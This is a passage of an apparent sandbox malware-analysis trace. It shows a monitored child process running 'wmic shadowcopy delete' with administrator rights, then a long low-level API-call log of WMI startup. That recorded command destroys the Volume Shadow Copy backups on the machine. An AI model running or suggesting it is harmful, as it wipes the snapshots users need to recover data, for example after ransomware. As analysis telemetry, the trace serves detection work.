0x134 Thread: id = 67 os_tid = 0xf28 Thread: id = 68 os_tid = 0xf5c Process: id = "13" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x7c75c000" os_pid = "0x13a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xd0c" cmd_line = "wmic shadowcopy delete " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0x13cc [0120.798] GetModuleHandleA (lpModuleName=0x0) returned 0xdb0000 [0120.798] __set_app_type (_Type=0x1) [0120.798] __p__fmode () returned 0x776f3c14 [0120.798] __p__commode () returned 0x776f49ec [0120.799] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xde9af0) returned 0x0 [0120.799] __wgetmainargs (in: _Argc=0xdf81a8, _Argv=0xdf81ac, _Env=0xdf81b0, _DoWildCard=0, _StartInfo=0xdf81bc | out: _Argc=0xdf81a8, _Argv=0xdf81ac, _Env=0xdf81b0) returned 0 [0120.800] ??0CHString@@QAE@XZ () returned 0xdf85ec [0120.800] malloc (_Size=0x18) returned 0x33c0ec0 [0120.800] malloc (_Size=0x38) returned 0x33c0ee0 [0120.800] malloc (_Size=0x28) returned 0x33c0f20 [0120.800] malloc (_Size=0x18) returned 0x33c0f50 [0120.800] malloc (_Size=0x24) returned 0x33c0f70 [0120.800] malloc (_Size=0x18) returned 0x33c0fa0 [0120.800] malloc (_Size=0x18) returned 0x33c0fc0 [0120.800] ??0CHString@@QAE@XZ () returned 0xdf88fc [0120.800] malloc (_Size=0x18) returned 0x33c0fe0 [0120.800] ?Empty@CHString@@QAEXXZ () returned 0x6bf465f8 [0120.801] SetConsoleCtrlHandler (HandlerRoutine=0xde3cc0, Add=1) returned 1 [0120.801] _onexit (_Func=0xdef370) returned 0xdef370 [0120.801] _onexit (_Func=0xdef380) returned 0xdef380 [0120.801] _onexit (_Func=0xdef390) returned 0xdef390 [0120.801] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.801] ResolveDelayLoadedAPI () returned 0x74a22590 [0120.802] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0120.807] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0126.474] CoCreateInstance (in: rclsid=0xdb6a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xdb6a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xdf8510 | out: ppv=0xdf8510*=0x32236c8) returned 0x0 [0127.447] GetCurrentProcess () returned 0xffffffff [0127.447] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2eef8d0 | out: TokenHandle=0x2eef8d0*=0x1a0) returned 1 [0127.448] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2eef8cc | out: TokenInformation=0x0, ReturnLength=0x2eef8cc) returned 0 [0127.448] malloc (_Size=0x118) returned 0x33c2598 [0127.448] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x33c2598, TokenInformationLength=0x118, ReturnLength=0x2eef8cc | out: TokenInformation=0x33c2598, ReturnLength=0x2eef8cc) returned 1 [0127.448] AdjustTokenPrivileges (in: TokenHandle=0x1a0, DisableAllPrivileges=0, NewState=0x33c2598*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.448] free (_Block=0x33c2598) [0127.448] CloseHandle (hObject=0x1a0) returned 1 [0127.448] malloc (_Size=0x40) returned 0x33c2598 [0127.448] malloc (_Size=0x40) returned 0x33c25e0 [0127.448] malloc (_Size=0x40) returned 0x33c2628 [0127.448] SetThreadUILanguage (LangId=0x0) returned 0x31e0409 [0127.721] _vsnwprintf (in: _Buffer=0x33c2628, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2eef858 | out: _Buffer="ms_409") returned 6 [0127.721] malloc (_Size=0x20) returned 0x33c2670 [0127.721] GetComputerNameW (in: lpBuffer=0x33c2670, nSize=0x2eef8bc | out: lpBuffer="NQDPDE", nSize=0x2eef8bc) returned 1 [0127.721] lstrlenW (lpString="NQDPDE") returned 6 [0127.721] malloc (_Size=0xe) returned 0x33c11d8 [0127.721] lstrlenW (lpString="NQDPDE") returned 6 [0127.721] ResolveDelayLoadedAPI () returned 0x7444db00 [0127.722] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2eef8d0 | out: lpNameBuffer=0x0, nSize=0x2eef8d0) returned 0x31e0000 [0127.723] GetLastError () returned 0xea [0127.723] malloc (_Size=0x1e) returned 0x33c2698 [0127.723] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x33c2698, nSize=0x2eef8d0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2eef8d0) returned 0x1 [0127.724] lstrlenW (lpString="") returned 0 [0127.724] lstrlenW (lpString="NQDPDE") returned 6 [0127.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0127.725] lstrlenW (lpString=".") returned 1 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0127.725] lstrlenW (lpString="LOCALHOST") returned 9 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0127.725] free (_Block=0x33c11d8) [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] malloc (_Size=0xe) returned 0x33c11d8 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.725] malloc (_Size=0xe) returned 0x33c26c0 [0127.725] lstrlenW (lpString="NQDPDE") returned 6 [0127.726] malloc (_Size=0x4) returned 0x33c26d8 [0127.726] malloc (_Size=0xc) returned 0x33c26e8 [0127.726] ResolveDelayLoadedAPI () returned 0x7745b870 [0127.835] malloc (_Size=0x18) returned 0x33c2700 [0127.835] malloc (_Size=0xc) returned 0x33c2720 [0127.835] SysStringLen (param_1="IDENTIFY") returned 0x8 [0127.835] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0127.835] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0127.835] SysStringLen (param_1="IDENTIFY") returned 0x8 [0127.835] malloc (_Size=0x18) returned 0x33c2738 [0127.835] malloc (_Size=0xc) returned 0x33c2758 [0127.835] SysStringLen (param_1="IMPERSONATE") returned 0xb [0127.835] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0127.835] SysStringLen (param_1="IMPERSONATE") returned 0xb [0127.835] SysStringLen (param_1="IDENTIFY") returned 0x8 [0127.835] SysStringLen (param_1="IDENTIFY") returned 0x8 [0127.835] SysStringLen (param_1="IMPERSONATE") returned 0xb [0127.835] malloc (_Size=0x18) returned 0x33c2770 [0127.835] malloc (_Size=0xc) returned 0x33c2790 [0127.835] SysStringLen (param_1="DELEGATE") returned 0x8 [0127.835] SysStringLen (param_1="IDENTIFY") returned 0x8 [0127.835] SysStringLen (param_1="DELEGATE") returned 0x8 [0127.835] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0127.835] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0127.835] SysStringLen (param_1="DELEGATE") returned 0x8 [0127.835] malloc (_Size=0x18) returned 0x33c27a8 [0127.835] malloc (_Size=0xc) returned 0x33c27c8 [0127.835] malloc (_Size=0x18) returned 0x33c27e0 [0127.835] malloc (_Size=0xc) returned 0x33c2800 [0127.835] SysStringLen (param_1="NONE") returned 0x4 [0127.835] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.835] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.835] SysStringLen (param_1="NONE") returned 0x4 [0127.835] malloc (_Size=0x18) returned 0x33c2818 [0127.835] malloc (_Size=0xc) returned 0x33c2838 [0127.836] SysStringLen (param_1="CONNECT") returned 0x7 [0127.836] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.836] malloc (_Size=0x18) returned 0x33c2850 [0127.836] malloc (_Size=0xc) returned 0x33c2870 [0127.836] SysStringLen (param_1="CALL") returned 0x4 [0127.836] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.836] SysStringLen (param_1="CALL") returned 0x4 [0127.836] SysStringLen (param_1="CONNECT") returned 0x7 [0127.836] malloc (_Size=0x18) returned 0x33c2888 [0127.836] malloc (_Size=0xc) returned 0x33c04a0 [0127.836] SysStringLen (param_1="PKT") returned 0x3 [0127.836] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.836] SysStringLen (param_1="PKT") returned 0x3 [0127.836] SysStringLen (param_1="NONE") returned 0x4 [0127.836] SysStringLen (param_1="NONE") returned 0x4 [0127.836] SysStringLen (param_1="PKT") returned 0x3 [0127.836] malloc (_Size=0x18) returned 0x33c04b8 [0127.836] malloc (_Size=0xc) returned 0x33c04d8 [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] SysStringLen (param_1="NONE") returned 0x4 [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] SysStringLen (param_1="PKT") returned 0x3 [0127.837] SysStringLen (param_1="PKT") returned 0x3 [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] malloc (_Size=0x18) returned 0x33c2bd0 [0127.837] malloc (_Size=0xc) returned 0x33c04f0 [0127.837] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0127.837] SysStringLen (param_1="DEFAULT") returned 0x7 [0127.837] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0127.837] SysStringLen (param_1="PKT") returned 0x3 [0127.837] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0127.837] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0127.837] malloc (_Size=0x18) returned 0x33c28f0 [0127.837] malloc (_Size=0x40) returned 0x33c0508 [0127.837] malloc (_Size=0x20a) returned 0x33c9598 [0127.837] GetSystemDirectoryW (in: lpBuffer=0x33c9598, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0127.837] free (_Block=0x33c9598) [0127.837] malloc (_Size=0xc) returned 0x33c0550 [0127.837] malloc (_Size=0xc) returned 0x33c0568 [0127.837] malloc (_Size=0xc) returned 0x33c95c0 [0127.837] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0127.837] SysStringLen (param_1="\\wbem\\") returned 0x6 [0127.838] free (_Block=0x33c0550) [0127.838] free (_Block=0x33c0568) [0127.838] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0127.838] free (_Block=0x33c95c0) [0127.838] malloc (_Size=0xc) returned 0x33c96b0 [0127.838] malloc (_Size=0xc) returned 0x33c9728 [0127.838] malloc (_Size=0xc) returned 0x33c9680 [0127.838] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0127.838] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0127.838] free (_Block=0x33c96b0) [0127.838] free (_Block=0x33c9728) [0127.838] GetCurrentThreadId () returned 0x13cc [0127.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2eef3e0 | out: phkResult=0x2eef3e0*=0x1ac) returned 0x0 [0127.838] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2eef3ec, lpcbData=0x2eef3e8*=0x400 | out: lpType=0x0, lpData=0x2eef3ec*=0x30, lpcbData=0x2eef3e8*=0x4) returned 0x0 [0127.838] _wcsicmp (_String1="0", _String2="1") returned -1 [0127.838] _wcsicmp (_String1="0", _String2="2") returned -2 [0127.838] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2eef3e8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2eef3e8*=0x42) returned 0x0 [0127.838] malloc (_Size=0x86) returned 0x33c2cb0 [0127.838] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x33c2cb0, lpcbData=0x2eef3e8*=0x42 | out: lpType=0x0, lpData=0x33c2cb0*=0x25, lpcbData=0x2eef3e8*=0x42) returned 0x0 [0127.838] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0127.839] malloc (_Size=0x42) returned 0x33c0550 [0127.839] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0127.839] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2eef3ec, lpcbData=0x2eef3e8*=0x400 | out: lpType=0x0, lpData=0x2eef3ec*=0x36, lpcbData=0x2eef3e8*=0xc) returned 0x0 [0127.839] _wtol (_String="65536") returned 65536 [0127.839] free (_Block=0x33c2cb0) [0127.839] RegCloseKey (hKey=0x0) returned 0x6 [0127.839] CoCreateInstance (in: rclsid=0xdb6ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xdb6ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2eef87c | out: ppv=0x2eef87c*=0x37445a8) returned 0x0 [0128.505] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x37445a8, xmlSource=0x2eef800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2eef868 | out: isSuccessful=0x2eef868*=0xffff) returned 0x0 [0129.611] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x37445a8, DOMElement=0x2eef878 | out: DOMElement=0x2eef878) returned 0x0 [0129.611] malloc (_Size=0xc) returned 0x33c96b0 [0129.612] free (_Block=0x33c96b0) [0129.612] malloc (_Size=0xc) returned 0x33c9608 [0129.612] free (_Block=0x33c9608) [0129.612] malloc (_Size=0xc) returned 0x33c9650 [0129.612] malloc (_Size=0xc) returned 0x33c96c8 [0129.613] malloc (_Size=0x18) returned 0x33c2bf0 [0129.613] malloc (_Size=0xc) returned 0x33c9698 [0129.613] free (_Block=0x33c9698) [0129.613] malloc (_Size=0xc) returned 0x33c9758 [0129.613] malloc (_Size=0xc) returned 0x33c9728 [0129.613] SysStringLen (param_1="VALUE") returned 0x5 [0129.613] SysStringLen (param_1="TABLE") returned 0x5 [0129.613] SysStringLen (param_1="TABLE") returned 0x5 [0129.613] SysStringLen (param_1="VALUE") returned 0x5 [0129.613] malloc (_Size=0x18) returned 0x33c2c10 [0129.614] malloc (_Size=0xc) returned 0x33c95c0 [0129.614] free (_Block=0x33c95c0) [0129.614] malloc (_Size=0xc) returned 0x33c9698 [0129.614] malloc (_Size=0xc) returned 0x33c95c0 [0129.614] SysStringLen (param_1="LIST") returned 0x4 [0129.614] SysStringLen (param_1="TABLE") returned 0x5 [0129.614] malloc (_Size=0x18) returned 0x33c2a70 [0129.614] malloc (_Size=0xc) returned 0x33c9668 [0129.614] free (_Block=0x33c9668) [0129.614] malloc (_Size=0xc) returned 0x33c9788 [0129.614] malloc (_Size=0xc) returned 0x33c9668 [0129.614] SysStringLen (param_1="RAWXML") returned 0x6 [0129.614] SysStringLen (param_1="TABLE") returned 0x5 [0129.614] SysStringLen (param_1="RAWXML") returned 0x6 [0129.615] SysStringLen (param_1="LIST") returned 0x4 [0129.615] SysStringLen (param_1="LIST") returned 0x4 [0129.615] SysStringLen (param_1="RAWXML") returned 0x6 [0129.615] malloc (_Size=0x18) returned 0x33c29f0 [0129.615] malloc (_Size=0xc) returned 0x33c9740 [0129.615] free (_Block=0x33c9740) [0129.615] malloc (_Size=0xc) returned 0x33c9740 [0129.615] malloc (_Size=0xc) returned 0x33c9770 [0129.615] SysStringLen (param_1="HTABLE") returned 0x6 [0129.615] SysStringLen (param_1="TABLE") returned 0x5 [0129.615] SysStringLen (param_1="HTABLE") returned 0x6 [0129.615] SysStringLen (param_1="LIST") returned 0x4 [0129.615] malloc (_Size=0x18) returned 0x33c2910 [0129.616] malloc (_Size=0xc) returned 0x33c95d8 [0129.616] free (_Block=0x33c95d8) [0129.616] malloc (_Size=0xc) returned 0x33c95d8 [0129.616] malloc (_Size=0xc) returned 0x33c95f0 [0129.616] SysStringLen (param_1="HFORM") returned 0x5 [0129.616] SysStringLen (param_1="TABLE") returned 0x5 [0129.616] SysStringLen (param_1="HFORM") returned 0x5 [0129.616] SysStringLen (param_1="LIST") returned 0x4 [0129.616] SysStringLen (param_1="HFORM") returned 0x5 [0129.616] SysStringLen (param_1="HTABLE") returned 0x6 [0129.616] malloc (_Size=0x18) returned 0x33c2950 [0129.616] malloc (_Size=0xc) returned 0x33c96b0 [0129.616] free (_Block=0x33c96b0) [0129.616] malloc (_Size=0xc) returned 0x33c9608 [0129.617] malloc (_Size=0xc) returned 0x33c9620 [0129.617] SysStringLen (param_1="XML") returned 0x3 [0129.617] SysStringLen (param_1="TABLE") returned 0x5 [0129.617] SysStringLen (param_1="XML") returned 0x3 [0129.617] SysStringLen (param_1="VALUE") returned 0x5 [0129.617] SysStringLen (param_1="VALUE") returned 0x5 [0129.617] SysStringLen (param_1="XML") returned 0x3 [0129.617] malloc (_Size=0x18) returned 0x33c2970 [0129.617] malloc (_Size=0xc) returned 0x33c96b0 [0129.617] free (_Block=0x33c96b0) [0129.617] malloc (_Size=0xc) returned 0x33c9638 [0129.617] malloc (_Size=0xc) returned 0x33c96b0 [0129.617] SysStringLen (param_1="MOF") returned 0x3 [0129.617] SysStringLen (param_1="TABLE") returned 0x5 [0129.617] SysStringLen (param_1="MOF") returned 0x3 [0129.617] SysStringLen (param_1="LIST") returned 0x4 [0129.617] SysStringLen (param_1="MOF") returned 0x3 [0129.617] SysStringLen (param_1="RAWXML") returned 0x6 [0129.617] SysStringLen (param_1="LIST") returned 0x4 [0129.617] SysStringLen (param_1="MOF") returned 0x3 [0129.618] malloc (_Size=0x18) returned 0x33c29d0 [0129.618] malloc (_Size=0xc) returned 0x33c96e0 [0129.618] free (_Block=0x33c96e0) [0129.618] malloc (_Size=0xc) returned 0x33c96e0 [0129.618] malloc (_Size=0xc) returned 0x33c96f8 [0129.618] SysStringLen (param_1="CSV") returned 0x3 [0129.618] SysStringLen (param_1="TABLE") returned 0x5 [0129.618] SysStringLen (param_1="CSV") returned 0x3 [0129.618] SysStringLen (param_1="LIST") returned 0x4 [0129.618] SysStringLen (param_1="CSV") returned 0x3 [0129.618] SysStringLen (param_1="HTABLE") returned 0x6 [0129.618] SysStringLen (param_1="CSV") returned 0x3 [0129.618] SysStringLen (param_1="HFORM") returned 0x5 [0129.618] malloc (_Size=0x18) returned 0x33c2a90 [0129.619] malloc (_Size=0xc) returned 0x33c9710 [0129.619] free (_Block=0x33c9710) [0129.619] malloc (_Size=0xc) returned 0x33c9710 [0129.619] malloc (_Size=0xc) returned 0x33caba8 [0129.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.619] SysStringLen (param_1="TABLE") returned 0x5 [0129.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.619] SysStringLen (param_1="VALUE") returned 0x5 [0129.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.619] SysStringLen (param_1="XML") returned 0x3 [0129.619] SysStringLen (param_1="XML") returned 0x3 [0129.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.619] malloc (_Size=0x18) returned 0x33c2990 [0129.619] malloc (_Size=0xc) returned 0x33cac20 [0129.619] free (_Block=0x33cac20) [0129.620] malloc (_Size=0xc) returned 0x33caad0 [0129.620] malloc (_Size=0xc) returned 0x33caa70 [0129.620] SysStringLen (param_1="texttablewsys") returned 0xd [0129.620] SysStringLen (param_1="TABLE") returned 0x5 [0129.620] SysStringLen (param_1="texttablewsys") returned 0xd [0129.620] SysStringLen (param_1="XML") returned 0x3 [0129.620] SysStringLen (param_1="texttablewsys") returned 0xd [0129.620] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.620] SysStringLen (param_1="XML") returned 0x3 [0129.620] SysStringLen (param_1="texttablewsys") returned 0xd [0129.620] malloc (_Size=0x18) returned 0x33c2c50 [0129.620] malloc (_Size=0xc) returned 0x33caa28 [0129.620] free (_Block=0x33caa28) [0129.620] malloc (_Size=0xc) returned 0x33ca938 [0129.620] malloc (_Size=0xc) returned 0x33caa10 [0129.620] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.620] SysStringLen (param_1="TABLE") returned 0x5 [0129.620] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.620] SysStringLen (param_1="XML") returned 0x3 [0129.620] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.621] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.621] malloc (_Size=0x18) returned 0x33c2a10 [0129.621] malloc (_Size=0xc) returned 0x33cab90 [0129.621] free (_Block=0x33cab90) [0129.621] malloc (_Size=0xc) returned 0x33caa88 [0129.621] malloc (_Size=0xc) returned 0x33cabf0 [0129.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.621] SysStringLen (param_1="TABLE") returned 0x5 [0129.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.621] SysStringLen (param_1="XML") returned 0x3 [0129.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.621] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.621] malloc (_Size=0x18) returned 0x33c2930 [0129.622] malloc (_Size=0xc) returned 0x33cac20 [0129.622] free (_Block=0x33cac20) [0129.622] malloc (_Size=0xc) returned 0x33cab60 [0129.622] malloc (_Size=0xc) returned 0x33ca9b0 [0129.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.622] SysStringLen (param_1="TABLE") returned 0x5 [0129.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.622] SysStringLen (param_1="XML") returned 0x3 [0129.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.622] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.622] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.622] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.622] malloc (_Size=0x18) returned 0x33c2c30 [0129.623] malloc (_Size=0xc) returned 0x33caaa0 [0129.623] free (_Block=0x33caaa0) [0129.623] malloc (_Size=0xc) returned 0x33caa40 [0129.623] malloc (_Size=0xc) returned 0x33caaa0 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] SysStringLen (param_1="TABLE") returned 0x5 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] SysStringLen (param_1="XML") returned 0x3 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.623] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.623] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0129.623] malloc (_Size=0x18) returned 0x33c29b0 [0129.623] malloc (_Size=0xc) returned 0x33caa28 [0129.624] free (_Block=0x33caa28) [0129.624] malloc (_Size=0xc) returned 0x33cabc0 [0129.624] malloc (_Size=0xc) returned 0x33ca9f8 [0129.624] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.624] SysStringLen (param_1="TABLE") returned 0x5 [0129.624] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.624] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.624] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.624] SysStringLen (param_1="XML") returned 0x3 [0129.624] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.624] SysStringLen (param_1="texttablewsys") returned 0xd [0129.624] SysStringLen (param_1="XML") returned 0x3 [0129.624] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.624] malloc (_Size=0x18) returned 0x33c2a30 [0129.624] malloc (_Size=0xc) returned 0x33caa28 [0129.624] free (_Block=0x33caa28) [0129.624] malloc (_Size=0xc) returned 0x33ca9e0 [0129.624] malloc (_Size=0xc) returned 0x33ca950 [0129.625] SysStringLen (param_1="htable-sortby") returned 0xd [0129.625] SysStringLen (param_1="TABLE") returned 0x5 [0129.625] SysStringLen (param_1="htable-sortby") returned 0xd [0129.625] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.625] SysStringLen (param_1="htable-sortby") returned 0xd [0129.625] SysStringLen (param_1="XML") returned 0x3 [0129.625] SysStringLen 